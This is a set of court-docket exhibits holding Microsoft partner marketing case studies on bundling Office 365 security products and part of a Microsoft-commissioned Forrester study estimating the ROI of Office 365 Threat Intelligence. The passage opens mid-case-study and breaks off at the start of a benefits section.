One of the ways Peters & Associates is addressing customer demand is through what Ward calls "bundling on steroids," using security and compliance solutions that can be packaged as new services to establish and extend customer engagements.

Bundling security tools dovetails perfectly with Peters & Associates desire to shift from project-based services to managed services that improve their competitive positioning and deliver higher margins. "Now we can say to customers, for a set fee per user per month, your desktop is covered. That includes the products, plus all our services to install, monitor 24/7, and handle incidents," Ward explained.

Ward highlights Microsoft's Advanced Threat protection (ATP) as one of the key launch points for bundling opportunities.

"ATP is selling like hot cakes, it's number one on our list," Ward said. "We call it Managed ATP, because ultimately what we do is bundle our pricing so we give them onboarding assistance, licensing assistance, user training support. Bundling our services around ATP is something smart to do."

## Establishing managed services + security.

Ward explained that security is one of the key components reshaping their practice. Security sells, so we're transitioning from managed services to managed services and security, and we're taking our customers with us, he said. "People are very focused on security. So, while we might have been monitoring the health of their servers before, now they also want us to monitor the security of those servers. To do that, we'll need all sorts of capabilities."

As examples, Ward pointed to Office 365 Advanced Threat Protection (ATP) and Advanced Threat Analytics (ATA). "For instance, we'll need ATP for better mail flow; we need Advanced Threat Analytics in EMS (Enterprise Mobility + Security) to know more about authentication that's occurring; we need to protect desktops, so we look at Endpoint Protection," he explained. "All of this is mind-numbing to customers; they just want to know their desktops are covered."

## Customer proof-of-concept fuels adoption.

The key, Ward suggested, is to get the tools in customers' hands so they can see them operating in their environment. Spending pre-sales dollars effectively to make sure customers understand the product in their world, helps users see value quickly, and makes it easier for partners to bundle additional solutions.

Some client engagements are driven by specific compliance requirements, where the organization has specific boxes they need to check.

As evidence, Ward described the sales cycle for a 2500-seat organization that needed a Cloud Application Security Broker (CASB) to support their work with the insurance industry. Because Microsoft Cloud App Security is deeply integrated into Office 365, Peters & Associates could structure a sale around what Ward calls the "5-5-5 program, involving Office 365 E5, EMS E5, and Windows 10 E5."

Another example involves a long-time Peters & Associates customer that recently became a government contractor, selling specialized equipment in the US and China. This raised the need to comply with new requirements for the protection of Controlled Unclassified Information (CUI). To meet the new requirements, Peters & Associates deployed Microsoft Advanced Threat Protection as an add-on to their existing business with the customer.

## Use products to break down barriers.

For Peters & Associates, security has become a key conversation starter to drive new business. Their strongest advice to other Microsoft partners is to get the product in and running in the customer's environment so they can see the value. As Ward says, "Nothing produces more 'Aha!' moments than when a customer first sees Advanced Threat Protection block malicious emails that normally would have gone into their inbox. That's when they say, 'I get it.'"

Microsoft Confidential, for internal and partner use only

This document is for informational purposes only.  MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY.

Case 0:20-cv-60416-XXXX Document 3-38 Entered on FLSD Docket 02/26/2020 Page 1 of 3

# EXHIBIT 36

**Microsoft**

## Office 365 Advanced Security and Compliance Solutions Case Study: Planet Technologies



### Company Profile:

Planet Technologies is a successful Microsoft partner with significant experience in cloud and datacenter services, cyber security, and mobile application development. They have a diverse practice, including public-sector engagements with many federal, state, and local government agencies.

Planet Technologies is a 6-time Federal Partner of the Year, 6-time State & Local Government Partner of the Year, and 5-time Windows Partner of the Year.

### Location:

Washington D.C. Metro Area
Germantown, Maryland

**"If they can get Advanced Threat Protection and other Office 365 security tools that provide the same functionally at a lower price point then what they are paying for their current solutions, they're going to jump at the opportunity."**

— Jeff Fowler, Federal Senior Cloud Strategist, Planet Technologies

### Finding the right fit with Office 365 security solutions.

As organizations deploy tools that allow employees to create, share, and use data across a variety of platforms, they're improving productivity, collaboration, and customer service, but that effort also increases risk if security is not managed effectively. Security threats to information systems and data increase rapidly, with new attacks and vulnerabilities affecting more enterprises and public-sector agencies every day.

Planet Technologies, a Microsoft partner based in the Washington DC metro area, has built a highly successful IT practice around Microsoft services and solutions. For more than twenty years, they've worked with a wide variety of enterprise clients. A large part of their practice focuses on federal, state, and local agencies, ranging from small cities all the way up to some of the largest federal agencies.

### Adding an advanced security solution for $2 a seat.

With a long history of public-sector engagements, Planet Technologies understands that government agencies are always security conscious. While most federal agencies have relied upon dedicated security solutions that require expensive subscriptions and costly hardware, they're finding that agencies are receptive to Microsoft security solutions as a fully capable, less costly alternative.

"These agencies realize they're spending tens of thousands of dollars a year on security subscriptions, not to mention the hardware costs," explained Jeff Fowler, Federal Senior Cloud Strategist for Planet Technologies. "If they can get Advanced Treat Protection (ATP) and other Office 365 security tools that provide the same functionally at a lower price point than what they are paying for their current solutions, they're going to jump at the opportunity."

Planet has a long-term contract with a large federal agency and has several staff on-site as an extension of the customer IT team. That high level of interaction drove conversations between the Planet team and the agency's IT management. As both sides looked at the expenses associated with the agency's existing threat protection measures, it became clear that Microsoft offered a more affordable solution to help address their needs.

As Fowler relates, "IT management at the federal customer wondered, 'Why are we paying for our current bolt-on security product when we can get similar functionality from Microsoft built-in for just a couple more bucks per user?' That made the decision to deploy ATP a no-brainer."

Advanced Threat Protection (ATP) is one of the specific reasons the agency decided to switch. "Using ATP, we've enabled Safe Links across the entire tenant with about 1,000 users now, and Safe Attachments is currently being trialed," Fowler said. "With Safe Attachments, they're focusing on high-target users and executives who tend to be the target of those types of attacks."

Microsoft Confidential, for internal and partner use only. MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY.

> "We are very excited about Secure Score. We use it to show customers where they stand today, then we show them how we can use different aspects of Office 365's security suite to help them improve their scores and in turn their security position."
>
> — Jeff Fowler, Federal Senior Cloud Strategist, Planet Technologies

## Driving engagements with Office 365 Advanced Security Management.

Planet Technologies sees more opportunities developing as customers learn how Office 365 Advanced Security Management gives them greater visibility and control over their Office 365 environments.

Planet Technologies envisions widespread application for Advanced Security Management in any organization that runs a Security Operations Center (SOC), with full-time security positions often staffed 24/7 to respond to any threats that develop. "Office 365 Advanced Security Management gives a SOC better insight and more control to secure their enterprise. It also helps them protect their end users from themselves, and they are very excited about that," Fowler said. "This is a big opportunity for large agencies to replace existing tools that cost a ton of money. That's a huge win for the customer."

Similarly, Planet Technologies believes they'll have additional opportunities to deepen their customer relationships as customers learn more about the specific benefits of Office 365 Secure Score, Advanced Threat Protection, Threat Intelligence, Customer Lockbox, and Advance Data Governance.

As an example, Fowler explains that Planet Technologies uses Secure Score to analyze customers' Office 365 security and the score they have which is based on their regular activities and security settings. "We are very excited about Secure Score," Fowler stated. "We use it to show customers where they stand today, then we show them how we can use different aspects of Office 365's security suite to help them improve their scores and in turn their security position."

## Capitalizing on the new reality that everything revolves around security.

As demand for new approaches to security has increased, Planet Technologies has recognized that there's an opportunity to build their business around a security mindset. They now view security as an integrated part of their toolset.

"Historically, we might go into an Office 365 engagement with a customer and help them with their Active Directory (AD) migration, making sure they're ready for AD replication and Azure AD. That's a security engagement, but we didn't always highlight the security aspect of it for our customers," Fowler said. "We're going to highlight that a lot more going forward."

"Tools such as Threat Intelligence and Advanced Threat Protection are new tools in our toolbox, and any one of them can create a scenario where we can upsell Office 365 E5 and other Microsoft solutions to customers. That gives us more new customers and opportunities for additional customer engagements that lead to more profit for our business," Fowler explained.

## A security deep-dive offers business development opportunities.

To leverage high levels of concern about security, Planet Technologies has recently launched a new Microsoft Cyber Security Workshop that provides an opportunity to show organizations how Office 365, Enterprise Mobility + Security, and Windows 10 can protect their data and end users.

Fowler explained that the Workshop provides customers with a one-on-one, five-day deep dive into security. "We go through scenarios and interviews to explore their security posture," Fowler said. "The goal is to uncover the biggest threats and identify the risks the agency is facing today. Then we present a debrief of our findings and recommend Microsoft products that address their needs."

## Helping public-sector agencies get the most from tools they already own.

Many clients don't have the full picture of the security tools available with Office 365 and other Microsoft products they already own, and they often think they need to spend more money to solve security challenges. To address this, Planet developed youalreadyownit.com, a free web service that helps US Public Sector customers align their organizational goals with their Microsoft products. The service helps establish Planet Technologies as a Microsoft solutions expert and gives them added visibility among potential government customers.

## Advice for other Microsoft partners.

Planet Technologies believes that Office 365 security tools aren't just beneficial for end users; they also give partners an opportunity to open or expand relationships with customers. As Fowler explains, "Security is one of the biggest problems organizations have today. A large percentage of organizations are compromised but don't know it yet because it can take weeks or months to realize you've been compromised. Office 365 tools give you real-time insight about what's happening in your organization, so you can reduce your exposure to risk and reduce incident response time in case of a breach. That's an important advantage."

Microsoft Confidential, for internal and partner use only. MICROSOFT MAKES NO WARRANTIES, EXPRESS OR IMPLIED, IN THIS SUMMARY.

# EXHIBIT 37

Case 0:20-cv-60415-XXXX   Document 2-1   Entered on FLSD Docket 02/26/2020   Page 598 of
Case 0:20-cv-60415-XXXX   Document 1-39   Entered on FLSD Docket 02/26/2020   Page 2 of 23
726

A Forrester Total Economic Impact™
Study Commissioned By Microsoft
September 2018

# The Total Economic Impact™ Of Microsoft Office 365 Threat Intelligence

Cost Savings And Business Benefits
Enabled By Threat Intelligence As Part Of
Office 365 E5

**FORRESTER®**

Case 0:20-cv-60416-AMC   Document 1-39   Entered on FLSD Docket 02/26/2020   Page 3 of 23

# Table Of Contents

| | |
|---|---|
| **Executive Summary** | **1** |
| Key Findings | 1 |
| TEI Framework And Methodology | 4 |
| **The Office 365 Threat Intelligence Customer Journey** | **5** |
| Interviewed Organizations | 5 |
| Key Drivers | 5 |
| Key Results | 6 |
| Composite Organization | 8 |
| **Analysis Of Benefits** | **9** |
| Avoided IT Costs Due To Consolidation Of Security Systems | 9 |
| Savings From Faster Remediation Of End User Security Events | 10 |
| Reduced End User Downtime | 12 |
| Reduced Likelihood Of A Data Breach — Business Impact | 13 |
| Flexibility | 14 |
| **Analysis Of Costs** | **15** |
| Licensing Costs | 15 |
| Implementation, Ongoing Support, and Training Costs | 15 |
| **Financial Summary** | **17** |
| **Microsoft Office 365 Threat Intelligence: Overview** | **18** |
| **Appendix A: Total Economic Impact** | **19** |
| **Appendix B: Endnotes** | **20** |

**Project Director:**
Adrienne Capaldo

ABOUT FORRESTER CONSULTING

Forrester Consulting provides independent and objective research-based consulting to help leaders succeed in their organizations. Ranging in scope from a short strategy session to custom projects, Forrester's Consulting services connect you directly with research analysts who apply expert insight to your specific business challenges. For more information, visit forrester.com/consulting.

© 2018, Forrester Research, Inc. All rights reserved. Unauthorized reproduction is strictly prohibited. Information is based on best available resources. Opinions reflect judgment at the time and are subject to change. Forrester®, Technographics®, Forrester Wave, RoleView, TechRadar, and Total Economic Impact are trademarks of Forrester Research, Inc. All other trademarks are the property of their respective companies. For additional information, go to forrester.com.



# Executive Summary

## Key Benefits



IT hours saved due to improved detection and response of security threats:
**27,168 hours each year**



Reduced likelihood of a security breach:
**60%**



Reduction in time required for investigation and remediation with Office 365 Threat Intelligence:
**89.3%**

Organizations must create a sophisticated system to protect against the ever-increasing threat of cyberattacks. Microsoft Office 365 Threat Intelligence enhances threat protection by enabling organizations to better detect, analyze, remediate, and educate against cyberthreats and improving its customers' overall security. Organizations found significant benefits from leveraging Threat Intelligence as part of their Microsoft Office 365 E5 deployment. Microsoft commissioned Forrester Consulting to conduct a Total Economic Impact™ (TEI) study and examine the potential return on investment (ROI) enterprises may realize by deploying Office 365 Threat Intelligence. The purpose of this study is to provide readers with a framework to evaluate the potential financial impact of Office 365 Threat Intelligence on their organizations. To better understand the benefits, costs, and risks associated with this investment, Forrester interviewed three customers and surveyed an additional 50 users of Office 365 Threat Intelligence.

Prior to deploying Office 365 E5 with Threat Intelligence, the interviewed and surveyed customers typically used many disparate third-party solutions to handle email and data file protection, resulting in complex security environments that were both expensive and difficult to manage. One key insight uncovered during interviews and through surveys was that organizations improve their overall security and get the most value of their investment when using Threat Intelligence as part of the Office 365 E5 license. This integrated suite of security products provides a holistic approach to security, providing end-to-end cyber protection. Threat Intelligence integrates seamlessly with other Office 365 features like Exchange Online Protection and Advanced Threat Protection to bring greater security to an organization. With the move to Office 365 E5, organizations leveraged Threat Intelligence to create a more secure, easier-to-manage security environment that not only decreased costs but provided actionable insights and improved the overall security of these organizations. Office 365 Threat Intelligence leverages the "Microsoft Intelligent Security Graph," which utilizes AI capabilities to analyze and continuously learn from billions of data points across Microsoft's ecosystem to better understand and provide actionable insights against potential security threats.

Forrester developed a composite organization based on data gathered from the customer interviews and surveys to reflect the total economic impact that Office 365 Threat Intelligence has on an organization. The composite organization is representative of these organizations and is used to present the aggregate financial analysis for this study.

## Key Findings

**Quantified benefits.** The following risk-adjusted present value (PV) quantified benefits are representative of those experienced by the organizations interviewed and surveyed:

FORRESTER®



**ROI
186%**



**Benefits PV
$4.2 million**



**NPV
$2.7 million**



**Payback
6 months**

› **Avoided IT costs of over $673K due to consolidation of security systems.** With the deployment of Office 365 E5, organizations can consolidate their security solutions onto a single platform, reducing licensing costs expended on a myriad of third-party security solutions. With Threat Intelligence, these organizations gain full visibility into their email, collaboration applications, and Windows Defender ATP ecosystems, resulting in significant time savings for the security operations teams, as they no longer need to manage and maintain multiple third-party security solution software or vendors. Beyond the cost reduction, this consolidation of security systems enables organizations to create "a single pane of glass" into their security environments, resulting in three-year risk adjusted avoided costs of $673,848.

› Reduced the severity and impact of end user security events, saving 27,168 hours of IT support time each year. By implementing Office 365 E5, organizations can leverage Threat Intelligence to greatly reduce the time-to-action and number of hours spent on remediation of phishing and malware events, resulting in a significant decrease in the impact and number of successful attacks. With Threat Intelligence, the time necessary for remediation events is reduced by 50 hours; with faster time-to-action, organizations also eliminate 528 security events annually. Organizations reduce both the severity and number of successful end user security events, yielding a three-year risk-adjusted total PV of over $1.9 million.

› **Reduced end user downtime, resulting in savings of nearly $1.27M.** With the reduction in both the number and severity of security events also comes a reduction in end user downtime. With Office 365 Threat Intelligence, users are less likely to be impacted by malware of phishing attacks that require downtime, such as manual remediation or complete refresh for their device, eliminating 6 hours of downtime per user each year.

› **Reduced the likelihood of a data breach, resulting in savings of over $321K in value.** Malware and phishing attacks create a considerable risk of a serious data breach that could have wide-reaching business impacts on an organization. With Office 365 Threat Intelligence, organziations reduce the likelihood of a data breach by 60%.

**Costs.** The organizations experienced the following risk-adjusted PV costs:

› **Licensing for 6,000 total mailboxes.** These represent costs paid to Microsoft for the use of Office 365 Threat Intelligence, at a rate of $8 per mailbox per month, resulting in a total risk-adjusted cost over the three years analyzed of $1.43 million.

› **Implementation, ongoing support, and training costs totaling $22K over three years.** These represent the mix of internal and external costs associated with Office 365 Threat Intelligence's implementation, ongoing support, and training.

Forrester's interviews with three existing customers, survey of 50 customers, and subsequent financial analysis found that an organization based on these customers experienced benefits of $4.2 million over three years versus costs of $1.5 million, adding up to a net present value (NPV) of $2.7 million and an ROI of 186%.

**FORRESTER®**

Case 0:20-cv-60416-XXXX   Document 1-39   Entered on FLSD Docket 02/26/2020   Page 602 of 726

**Financial Summary**



**Benefits (Three-Year)**



FORRESTER®

The TEI methodology helps companies demonstrate, justify, and realize the tangible value of IT initiatives to both senior management and other key business stakeholders.

# TEI Framework And Methodology

From the information provided in the interviews and survey, Forrester has constructed a Total Economic Impact™ (TEI) framework for those organizations considering implementing Microsoft Office 365 Threat Intelligence.

The objective of the framework is to identify the cost, benefit, flexibility, and risk factors that affect the investment decision. Forrester took a multistep approach to evaluate the impact that Microsoft Office 365 Threat Intelligence can have on an organization:



**DUE DILIGENCE**
Interviewed Microsoft stakeholders and Forrester analysts to gather data relative to Office 365 Threat Intelligence.



**CUSTOMER INTERVIEWS AND SURVEY**
Interviewed three organizations and surveyed 50 organizations using Office 365 Threat Intelligence to obtain data with respect to costs, benefits, and risks.



**COMPOSITE ORGANIZATION**
Designed a composite organization based on characteristics of the interviewed and surveyed organizations.



**FINANCIAL MODEL FRAMEWORK**
Constructed a financial model representative of the interviews and survey using the TEI methodology and risk-adjusted the financial model based on issues and concerns of the interviewed organizations.



**CASE STUDY**
Employed four fundamental elements of TEI in modeling Microsoft Office 365 Threat Intelligence's impact: benefits, costs, flexibility, and risks. Given the increasing sophistication that enterprises have regarding ROI analyses related to IT investments, Forrester's TEI methodology serves to provide a complete picture of the total economic impact of purchase decisions. Please see Appendix A for additional information on the TEI methodology.

DISCLOSURES

Readers should be aware of the following:

This study is commissioned by Microsoft and delivered by Forrester Consulting. It is not meant to be used as a competitive analysis.

Forrester makes no assumptions as to the potential ROI that other organizations will receive. Forrester strongly advises that readers use their own estimates within the framework provided in the report to determine the appropriateness of an investment in Microsoft Office 365 Threat Intelligence.

Microsoft reviewed and provided feedback to Forrester, but Forrester maintains editorial control over the study and its findings and does not accept changes to the study that contradict Forrester's findings or obscure the meaning of the study.

Microsoft provided the customer names for the interviews but did not participate in the interviews.



Case 0:20-cv-60416-XXXX   Document 1-19   Entered on FLSD Docket 02/26/2020   Page 604 of
726
Case 0:20-cv-60416-XXXX   Document 1-39   Entered on FLSD Docket 02/26/2020   Page 9 of 23

# The Office 365 Threat Intelligence Customer Journey

**BEFORE AND AFTER THE OFFICE 365 THREAT INTELLIGENCE INVESTMENT**

## Interviewed Organizations

For this study, Forrester conducted three interviews with Microsoft Office 365 Threat Intelligence customers. In addition, Forrester surveyed 50 customers to better understand the challenges, results, key benefits, and costs associated with the Office 365 Threat Intelligence investment. Many of the interviewed and survey respondents were using Office 365 Threat Intelligence as part of their overall Office 365 E5 licensing. All respondents met the following selection criteria:

- They were headquartered in North America or the UK.

- Each respondent was an IT decision maker responsible for cybersecurity within their organization.

- They had 500 or more employees; the majority of respondents had 2,000 or more employees.

- Annual revenue ranged from less than $100M to more than $5B.

- They represent a wide variety of industries, including manufacturing, professional services, healthcare, and telecommunications.

## Key Drivers

The interviewed and surveyed organizations highlighted several key drivers that led them to invest in Office 365 E5 and Threat Intelligence:

› The organizations wanted to be able to better identify, monitor, and understand cyberthreats and minimize the risk associated with them. Protecting users from a wide variety of security threats is becoming more complicated, and the implications of a data breach are escalating, with both internal and external business impact. Each of the organizations Forrester spoke with noted that the main driver for their investment in Office 365 E5 and Threat Intelligence was to improve their overall security and minimize the risk associated with cyberthreats. As these organizations began to study their existing security landscapes and road map their desires for the future, they understood that they needed to do more to protect their organizations. An enterprise architect at a financial services organization discussed the organization's current and future security landscape: "It was decided that having a simple signature-based product was not sufficient to protect us from the persistent threats. So, then we started an investigation into, 'Okay, can we invest in more sophisticated security products to do enterprise detection and response?'" The enterprise architect added, "Phishing is a major problem for us, like everybody else, and the ability to be able to identify mailboxes that receive the particular phishing attack and pull the message from those mailboxes before some number of them click on it, was a big factor in our investment." In fact, due to the wide-ranging implications of a security incident or data breach, enterprise security professionals are

> "Phishing is a major problem for us, like everybody else, and the ability to be able to identify mailboxes that receive the particular phishing attack and pull the message from those mailboxes before some number of them click on it, was a big factor in our investment."
>
> *Enterprise architect, financial services*

**Threat Intelligence helps us better understand the risks and threat landscape of our organization.**



**96%**
Of security professionals agree



tasked with the difficult job of ensuring that not only internal employees are protected, but that their ability to protect their internal team ensures the trust and security of their end customers. The financial services organization summed it up: "People have to trust us to take care of them, and it requires us to have a certain level of overall security. The better we are at doing cybersecurity and keeping track of those threats and avoiding them and remediating them quickly, the more trustworthy we will be at least to the regulators, and in the end, the general public." The ability to identify, monitor, understand, and minimize the risk associated with cyberattacks was a key goal in the investment in Office 365 E5 and Threat Intelligence.

› **Third-party solutions created a complex environment that was a burden on existing IT resources.** Many of the organizations hoped to reduce the operational complexity that had existed within their security landscapes and were looking to consolidate their solutions to create more integrated and more cost-effective security environments. Organizations found that it was often a heavy burden on their security operations teams to manage and maintain the many disparate systems that made up their security solutions. This also created an issue in which there was not central visibility across all the solutions, often leading to a fragmented view of the threat landscape. This lack of visibility was a point of frustration for IT professionals as it took a significant amount of time and effort to investigate, monitor, and remediate threats.

› **The companies were interested in leveraging new technologies but were operating within tight IT budget constraints.** While these organizations were up against budgetary and resource constraints, there was also a lot of interest in exploring how leveraging new technologies such as artificial intelligence and machine learning could impact and improve their cybersecurity. Many of the IT security professionals Forrester spoke with were interested in understanding how they could invest in a solution across the continuously evolving products available to them that would enable them to take advantage of the future benefits of AI, but in a cost-effective environment. Organizations hoped that through leveraging these types of technologies, they could have more insights and automation around understanding and remediating their threat landscapes in the future.

## Key Results

After an evaluation period, the interviewed organizations selected Office 365 Threat Intelligence. The interviews and survey data revealed that key results from the Office 365 Threat Intelligence investment include:

› **Improved overall security.** Across interviews and surveys, Forrester heard that the leveraging Threat Intelligence as part of their investment in Office 365 E5 led to an improvement in the organizations' overall security. The IT security director in the education industry told us, "With the use of Threat Intelligence, we experience fewer losses, have less incident response costs internally and in terms of outside council, forensics groups, because Threat Intelligence has effectively reduced risk and reduced successful attacks and mitigated damages." Threat Intelligence captures data from the Microsoft Intelligent Security Graph to ensure greater visibility across the threat landscape and help organizations better detect threats. Threat Intelligence creates actionable insights for these organizations that helped them to

"I think much of the value for us as a company is in the fact that it's a more coherent and more integrated landscape than we could ever achieved with all kinds of third-party solutions."

*Enterprise architect, financial services*



"We're a small team, and I think the goal of getting machine learning and AI to better recognize these attacks and automate a response . . . I think that would certainly help us with the small staff size. We can take advantage of those machine learning/AI capabilities in order to maximize what our team is able to do."

*IT security director, education*



**FORRESTER**®

investigate, monitor, and ultimately protect against cyberthreats. For example, describing an incident the organization had encountered earlier that day, one organization told us: "This morning, the incident was probably 90% remediated within 15 minutes of us being alerted to it. That's not something we could do at all before Threat Intelligence." With real-time and customizable threat alert notifications, organizations are better able to respond to incidents. Across the board, organizations greatly reduced the number of hours spent on investigation and remediation with the investment in Threat Intelligence and reported this helped them to reduce the number of successful malware and phishing attacks. Forrester heard from one organization: "Remediation is definitely faster. And not even is it just faster, but we have far more capabilities now for remediation. In a lot of cases in the past, there was nothing we could now. Now, with Threat Intelligence, it's quick and extremely capable."

While the focus of this study is specifically on the value of Office 365 Threat Intelligence, one key insight uncovered during interviews and through surveys was that organizations improve their overall security and get the most value of their investment when using Threat Intelligence as part of the Office 365 E5 license. This integrated suite of security products provides a holistic approach to security, providing end-to-end cyberprotection. Threat Intelligence integrates seamlessly with other Office 365 features like Exchange Online Protection and Advanced Threat Protection to bring greater security to an organization. One organization utilizing Threat Intelligence as part of its E5 license told us: "It's the integration between these products that gives them extra value. They gave us capabilities that would not have been able to afford in the past. And the fact that they're integrated with each other and sharing information back and forth to some degree makes this much more valuable".

› **Reduced costs associated with licensing and support.** The investment in Office 365 E5 with Threat Intelligence enabled these organizations to reduce many of the costs and time associated with identifying, monitoring, and remediating threats by consolidating the solutions required for these tasks. Threat Intelligence brought many capabilities together under one cost-effective solution for interviewed organizations: "Threat Intelligence's capabilities are something we didn't have before, and because of the bundle that Microsoft put together, this was affordable for us at the scale that we needed to do it." Organizations saw great value in consolidating on a trusted platform. The financial services organization told us, "We value best of suite over best of breed. We also trust Microsoft. We've seen their track record, we've talked to these guys, we are in touch with this group regularly, we believe that we have the same vision that they will bring us forward. They will become part of a much more holistic approach to our enterprise security."

Beyond the reduction in licensing costs through eliminating many third-party solutions, Threat Intelligence reduced the time required for management and maintenance of these systems. With Threat Intelligence, organizations can now view prospective threats through a "single pane of glass," creating greater visibility and understanding into prospective threats. Specifically, Office 365 Threat Intelligence has helped organizations gain deeper visibility into their email, collaboration applications, and Windows Defender ATP ecosystems. Features like the threat dashboard enable organizations to quickly and



**We can better protect our users with Threat Intelligence's security recommendations based on user behaviors.**

**94%**
Of security professionals agree

"If we were to buy individual products that had all the same capabilities, we would have to spend so much more. In reality, we would not be able to afford it. I believe this was a very good use of the funds that we did have available to us. It gave us far more capability than we could've gotten with that level of funding from competitors."

*Information security engineer, education*



FORRESTER®

easily understand in a visual format what threats have been addressed. Survey results revealed that 86% of IT security professionals agreed that the threat dashboard enabled them to quickly and accurately understand potential threats. By consolidating onto Threat Intelligence, the security team can more easily monitor and investigate threats, reducing the burden on the staff. In addition, with more proactive monitoring capabilities and recommendation for remediation, organizations can act more quickly and cost-effectively on remediation efforts.

Not only did Threat Intelligence reduce costs for the IT organization, but it also improved the end user's experience by minimizing downtime. One organization, regarding the reduction in downtime, stated: "I fully believe that we have prevented compromised accounts using these tools. I would think dozens, maybe hundreds, of accounts over the last six months have not been comprised because of this toolset, and for those individuals, there is definite savings, as we would have to shut their account down previously."

› **Leveraged new AI technology to improve overall understanding and remediation of cyberthreats.** With new artificial intelligence and machine learning features, Office 365 E5 enables organization to leverage Microsoft's continuously learning and improving algorithms to protect against threats. One organization described to us that "one of Microsoft's big selling points for us, they have so many million data points that the longer this is out there, the smarter it is going to get; if we talk a year from now, it may be that we're getting significantly larger benefits than we are receiving today." Threat Intelligence leverages Microsoft Intelligent Security Graph, which analyzes billions of data points across the Office 365 ecosystem to better understand malware and phishing campaigns, to educate organizations on key factors like top targeted users, malware frequency, and security recommendations. As Threat Intelligence continues to grow its use of these features, organizations will be able to more easily understand and automate response to threats, reducing the number of attacks, costs associated with support, and the likelihood and severity of data breaches.

## Composite Organization

Based on the interviews and survey, Forrester constructed a TEI framework, a composite company, and an associated ROI analysis that illustrates the areas financially affected. The composite organization is representative of the three companies that Forrester interviewed and the 50 organizations Forrester surveyed, and it is used to present the aggregate financial analysis in the next section. The composite organization that Forrester synthesized from the customer data has the following characteristics:

**Description of composite.** The composite organization is a global organization with most of its operations in North America and Europe. The organization has 7,000 total employees. Out of those, 5,000 employees utilize Office 365 E5 solutions. There are 6,000 mailboxes, including individual and shared accounts, that utilize Office 365 solutions.

**Deployment characteristics.** The composite organization moved its 6,000 mailboxes from disparate third-party solutions to Office 365 E5. Specifically, the organization leveraged the following components of Threat Intelligence: Threat Tracker; Threat Dashboard; Threat Explorer, and Threat Intelligence Reports.



"Our strategy is twofold: First it is to prevent any current attacks and to understand what is happening and who the culprits are. Second, it is to be proactive and strive to put up a barrier against any future unknown types of threats or attacks."

*Survey respondent, professional services*

**Threat Intelligence's use of machine learning algorithms helped us mitigate phishing campaigns.**



**90%**
Of security professionals agree



**Key assumptions**
5,000 employees
6,000 mailboxes



Case 0:20-cv-60416-XXXX   Document 1-39 Entered on FLSB Docket 02/26/2020   Page 12 of
26

# Analysis Of Benefits

**QUANTIFIED BENEFIT DATA AS APPLIED TO THE COMPOSITE**

| REF. | Benefit | Initial | Year 1 | Year 2 | Year 3 | Total | Present Value |
|------|---------|---------|--------|--------|--------|-------|---------------|
| Atr | Avoided IT costs due to consolidation of security systems | $0 | $223,594 | $272,813 | $326,250 | $822,656 | $673,848 |
| Btr | Savings from faster remediation of end user security events | $0 | $764,100 | $764,100 | $764,100 | $2,292,300 | $1,900,204 |
| Ctr | Reduced end user downtime | $0 | $510,000 | $510,000 | $510,000 | $1,530,000 | $1,268,295 |
| Dtr | Reduced likelihood of data breach — business impact | $0 | $118,150 | $129,965 | $141,780 | $389,896 | $321,341 |
| | Total benefits (risk-adjusted) | $0 | $1,615,844 | $1,676,878 | $1,742,130 | $5,034,852 | $4,163,687 |

## Avoided IT Costs Due To Consolidation Of Security Systems

With a full suite of end user security features and functionality, Office 365 E5 enables organizations to protect against cyberthreats from one single solution instead of multiple third-party solutions. With the deployment of Office 365 E5, Threat Intelligence supports organizations as they consolidate their security solutions onto a single platform, reducing licensing costs expended on a myriad of third-party security solutions. Interviewees and survey respondents reported a range of eliminated licensing costs from $25,000 to $600,000.

This consolidation into a single solution also results in significant time savings for the security operations teams, as they no longer need to manage and maintain multiple third-party security solution software or vendors. Beyond the cost reduction, this consolidation of security systems enables organizations to create "a single pane of glass" into their security environment. With Threat Intelligence, organizations gain full visibility into their email, collaboration applications, and Windows Defender ATP ecosystems. Further, the security operations team no longer needs to review many different systems to gain a full understanding of the threat landscape and gain greater efficiency and effectiveness in the investigation, monitoring, and remediation of issues.

Forrester assumes that:

> Initially, the composite organization eliminates licensing costs of $200,000 on third-party security solutions. As the organization becomes more proficient at leveraging Office 365 E5 with Threat Intelligence, it continues to decrease its reliance on other security solutions, increasing to $300,000 in decreased licensing costs by Year 3.

> Likewise, there is a reduction in the time spent by the security professionals responsible for managing and maintaining those solutions. Initially, that time is reduced by 775 hours annually, increasing to 1,000 hours by Year 3 as the organization continues to eliminate those third-party solutions.

> An average hourly fully loaded salary of $62.50 is used for IT FTEs.

The table above shows the total of all benefits across the areas listed below, as well as present values (PVs) discounted at 10%. Over three years, the composite organization expects risk-adjusted total benefits to be a PV of more than $4.1 million.



**$673,848**

three-year benefit PV

16%

Avoided IT costs:
**16% of total benefits**



Case 0:20-cv-60416-AMC  Document 3-1  Entered on FLSB Docket 02/26/2020  Page 609 of 726

The avoided costs due to consolidation of security systems can vary with:

› The licensing costs associated with third-party security solutions.

› The number of hours required to support and maintain those solutions.

› The fully loaded hourly salary of IT security professionals.

To account for these risks, Forrester adjusted this benefit downward by 10%, yielding a three-year risk-adjusted total PV of $673,848.

> Impact risk is the risk that the business or technology needs of the organization may not be met by the investment, resulting in lower overall total benefits. The greater the uncertainty, the wider the potential range of outcomes for benefit estimates.

| | Avoided IT Costs Due To Consolidation Of Security Systems: Calculation Table | | | | |
|---|---|---|---|---|---|
| Ref. | Metric | Calculation | Year 1 | Year 2 | Year 3 |
| A1 | Avoided third-party security solution costs | | $200,000 | $250,000 | $300,000 |
| A2 | Avoided hours of IT effort to support and maintain third-party security solutions | | 775 | 850 | 1,000 |
| A3 | Average hourly IT salary | | $62.50 | $62.50 | $62.50 |
| At | Avoided IT costs due to consolidation of security systems | A1+(A2*A3) | $248,438 | $303,125 | $362,500 |
| | Risk adjustment | ↓10% | | | |
| Atr | **Avoided IT costs due to consolidation of security systems (risk-adjusted)** | | **$223,594** | **$272,813** | **$326,250** |

## Savings From Faster Remediation Of End User Security Events

